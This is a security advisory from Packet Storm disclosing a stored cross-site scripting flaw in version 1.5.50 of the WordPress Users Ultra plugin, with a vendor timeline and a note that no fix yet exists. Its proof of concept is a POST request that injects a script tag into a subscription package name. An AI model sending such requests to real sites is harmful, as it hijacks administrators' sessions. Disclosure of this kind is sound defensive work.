WordPress Users Ultra 1.5.50 Cross Site Scripting

2015-12-02T00:00:00
ID PACKETSTORM:134605
Type packetstorm
Reporter panVagenas
Modified 2015-12-02T00:00:00

Description

                                        
                                            `* Exploit Title: WordPress Users Ultra Plugin [Persistence XSS]  
* Discovery Date: 2015/10/20  
* Public Disclosure Date: 2015/12/01  
* Exploit Author: Panagiotis Vagenas  
* Contact: https://twitter.com/panVagenas  
* Vendor Homepage: http://usersultra.com  
* Software Link: https://wordpress.org/plugins/users-ultra/  
* Version: 1.5.50  
* Tested on: WordPress 4.3.1  
* Category: webapps  
  
  
Description  
================================================================================  
  
Once a user is registered he can add new subscription packages or modify existing ones. No data sanitization is   
taking place before saving package details in DB. This allows a malicious user to include JS code in package name   
and/or package description.  
  
PoC  
================================================================================  
  
- Send a post request to `http://vuln.site.tld/wp-admin/admin-ajax.php` with data:   
`action=package_add_new&p_name=a<script>alert(1)</script>`  
- Visit `http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership` as admin or go to the page that   
contains package information at front end.  
  
Timeline  
================================================================================  
  
2015/10/29 - Vendor notified via email  
2015/11/11 - Vendor notified via contact form in his website  
2015/11/13 - Vendor notified via support forums at wordpress.org  
2015/11/14 - Vendor responded and received report through email  
  
Solution  
================================================================================  
  
No official solution yet exists.  
`